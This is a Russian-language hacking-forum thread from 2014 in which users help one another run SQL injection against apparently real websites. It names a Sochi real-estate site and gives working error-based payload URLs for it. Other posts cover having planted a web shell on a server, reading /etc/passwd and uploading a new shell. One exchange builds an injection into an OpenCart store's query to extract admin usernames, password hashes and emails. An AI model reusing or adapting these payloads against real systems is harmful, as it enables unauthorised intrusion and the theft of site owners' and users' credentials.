HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.06.2014, 23:08
Gulik
Новичок
Регистрация: 15.03.2007
Сообщений: 20
С нами: 10083965

Репутация: 19
По умолчанию

Цитата:
Сообщение от kingbeef  
http://sochi-home.com/objects/novostroyki.html?types=1+and(select+1+from(select+ count(*),concat((select+column_name+from+informati on_schema.columns+where+table_name=0x7573657273+li mit+0,1),floor(rand(0)*2))x+from+information_schem a.tables+group+by+x)a)--+g
Благодарю. Но у меня опять ЧП

Код:
http://sochi-ho me.com/objects/novostroyki.html?types=1+and(select+1+from(select+count(*),concat((select+login+from+urchenko_home.users+limit+0,1),floor(rand(0)*2))x+from+urchenko_home.users+group+by+x)a)+--
Выдает такое

Subquery returns more than 1 row
 
Ответить с цитированием

  #2  
Старый 22.06.2014, 23:22
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gulik  
Благодарю. Но у меня опять ЧП
Код:
http://sochi-ho me.com/objects/novostroyki.html?types=1+and(select+1+from(select+count(*),concat((select+login+from+urchenko_home.users+limit+0,1),floor(rand(0)*2))x+from+urchenko_home.users+group+by+x)a)+--
Выдает такое
Subquery returns more than 1 row
http://sochi-home.com/objects/novostroyki.html?types=1+and(select+1+from(select+ count(*),concat((select+concat(mid(login,1,100))+f rom+users+limit+1,1),floor(rand(0)*2))x+from+infor mation_schema.tables+group+by+x)a)--+g
 
Ответить с цитированием

  #3  
Старый 23.06.2014, 20:39
Aniweste
Новичок
Регистрация: 28.05.2010
Сообщений: 0
С нами: 8397749

Репутация: 0
По умолчанию

Новый серв - новый вопрос.

Есть уязвимость site.com/1.php?id=1'

Удалось до этого залится на сайт и получить шелл, а по нему узнать полный путь до каталога: /home/1/online/site/htdocs/ , но к сожалению шелл сразу удалили

При попытке чтения '/etc/passwd' - всё ок.

При попытке чтения '/home/1/online/site/htdocs/robots.txt' - пустое место.

Так и должно быть? Или я где-то намудрил?

И можно ли как-нибудь залить шелл? (file_priv=Y)
 
Ответить с цитированием

  #4  
Старый 23.06.2014, 20:48
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Можно ли в FROM задать имя таблицы, с которой нужно извлечь данные - динамически?
 
Ответить с цитированием

  #5  
Старый 25.06.2014, 00:32
Aniweste
Новичок
Регистрация: 28.05.2010
Сообщений: 0
С нами: 8397749

Репутация: 0
По умолчанию

В том-то и проблема, что все папки на запись
 
Ответить с цитированием

  #6  
Старый 25.06.2014, 22:04
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Цитата:
Сообщение от Aniweste  
Новый серв - новый вопрос.
Есть уязвимость
site.com/1.php?id=1'
Удалось до этого залится на сайт и получить шелл, а по нему узнать полный путь до каталога:
/home/1/online/site/htdocs/
, но к сожалению шелл сразу удалили
При попытке чтения '/etc/passwd' - всё ок.
При попытке чтения '/home/1/online/site/htdocs/robots.txt' - пустое место.
Так и должно быть? Или я где-то намудрил?
И можно ли как-нибудь залить шелл? (file_priv=Y)
Возможно MySQL крутится на другом сервере, а сайт на другом.
 
Ответить с цитированием

  #7  
Старый 27.06.2014, 02:15
Aniweste
Новичок
Регистрация: 28.05.2010
Сообщений: 0
С нами: 8397749

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ereee  
Возможно MySQL крутится на другом сервере, а сайт на другом.
Да, к сожалению
 
Ответить с цитированием

  #8  
Старый 08.07.2014, 01:11
EksTasy
Познающий
Регистрация: 26.10.2008
Сообщений: 61
С нами: 9231652

Репутация: 2
По умолчанию

имеется сайт на opencart и доступ к такому запросу, но все не так просто как хотелось бы, у нас только изменяемая переменная product_id с нашим значением.

Самое простое что получилось сделать, это выудить название таблиц из information_schema.

Хотелось бы добраться до названий столбцов таблиц и самих значений.

Цитата:
Сообщение от None  
SELECT s.stock_id, sd.name, sd.address, sd.surname, s.seek, (SELECT IFNULL(SUM(qty),0) FROM oc_stock_product_quantity WHERE stock_id = s.stock_id AND product_id = '666') as qty FROM oc_stock s LEFT JOIN oc_stock_description sd ON (s.stock_id = sd.stock_id) WHERE sd.language_id = '1' AND s.hidden = 0 AND s.sp != 1 AND s.stock_id IN (SELECT st2s.stock_id FROM oc_stock_to_organization AS st2s LEFT JOIN oc_organization_to_store o2s ON (st2s.organization_id = o2s.organization_id) WHERE o2s.store_id = 0) ORDER BY s.sort_order
 
Ответить с цитированием

  #9  
Старый 08.07.2014, 08:03
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417113

Репутация: 0
По умолчанию

Цитата:
Сообщение от EksTasy  
имеется сайт на opencart и доступ к такому запросу, но все не так просто как хотелось бы, у нас только изменяемая переменная product_id с нашим значением.
Самое простое что получилось сделать, это выудить название таблиц из information_schema.
Хотелось бы добраться до названий столбцов таблиц и самих значений.
Здесь все как нельзя лучше - инъекция в select_expr. Вы не указали, какие столбцы идут на выход. Если первые идут, то эксплуатация такова:

Цитата:
Сообщение от None  
SELECT s.stock_id, sd.name, sd.address, sd.surname, s.seek, (SELECT IFNULL(SUM(qty),0) FROM oc_stock_product_quantity WHERE stock_id = s.stock_id AND product_id = '
-666')-555*-1 as qty FROM (SELECT (1) stock_id, (2) seek)s JOIN (SELECT (3) name, (4) address, (5) surname)sd --
') as qty FROM oc_stock s LEFT JOIN oc_stock_description sd ON (s.stock_id = sd.stock_id) WHERE sd.language_id = '1' AND s.hidden = 0 AND s.sp != 1 AND s.stock_id IN (SELECT st2s.stock_id FROM oc_stock_to_organization AS st2s LEFT JOIN oc_organization_to_store o2s ON (st2s.organization_id = o2s.organization_id) WHERE o2s.store_id = 0) ORDER BY s.sort_order
Должно сработать (при выводе 1, 2, 3, 4, 5 на их место подставляйте свои запросы). Если на выход идет только 6-ой столбец (555) или имеет место что-то ещё - напишите об этом, приведу соответствующую технику.
 
Ответить с цитированием

  #10  
Старый 08.07.2014, 17:30
EksTasy
Познающий
Регистрация: 26.10.2008
Сообщений: 61
С нами: 9231652

Репутация: 2
По умолчанию

Цитата:
Сообщение от XAMEHA  
Здесь все как нельзя лучше - инъекция в select_expr. Вы не указали, какие столбцы идут на выход. Если первые идут, то эксплуатация такова:
Должно сработать (при выводе 1, 2, 3, 4, 5 на их место подставляйте свои запросы). Если на выход идет только 6-ой столбец (555) или имеет место что-то ещё - напишите об этом, приведу соответствующую технику.
Цитата:
Сообщение от None  
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'FROM oc_stock s LEFT JOIN oc_stock_description sd ON (s.stock_id = sd' at line 8
Error No: 1064
SELECT s.stock_id, sd.name, sd.address, sd.metro, s.icon, (SELECT IFNULL(SUM(qty),0) FROM oc_stock_product_quantity WHERE stock_id = s.stock_id AND product_id = '37123')-555*-1 as qty FROM (SELECT (SELECT user_id from oc_user where user_id=19471) stock_id, (SELECT username from oc_user where user_id=19471) icon)s JOIN (SELECT (SELECT password from oc_user where user_id=19471) name, (SELECT email from oc_user where user_id=19471) address, (SELECT user_group_id from oc_user where user_id=19471) metro)sd -- ') as qty FROM oc_stock s LEFT JOIN oc_stock_description sd ON (s.stock_id = sd.stock_id) WHERE sd.language_id = '1' AND s.hidden = 0 AND s.sp != 1 AND s.stock_id IN (SELECT st2s.stock_id FROM oc_stock_to_organization AS st2s LEFT JOIN oc_organization_to_store o2s ON (st2s.organization_id = o2s.organization_id) WHERE o2s.store_id = 0) ORDER BY s.sort_order
видимо не хочет воспринимать знак комментария --, либо я что-то неправильно делаю.

конструкция вида -36103 вызывает ощибку "Товар не найден!".
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...